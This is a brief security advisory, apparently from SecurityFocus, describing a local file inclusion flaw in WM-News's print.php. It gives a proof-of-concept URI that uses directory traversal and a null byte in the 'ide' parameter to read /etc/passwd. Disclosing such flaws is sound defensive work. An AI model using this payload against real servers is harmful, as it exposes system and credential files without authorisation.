WM-News Print.PHP Local File Include Vulnerability

An attacker can exploit this issue via a web-client.

The following proof-of-concept URI is available:http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus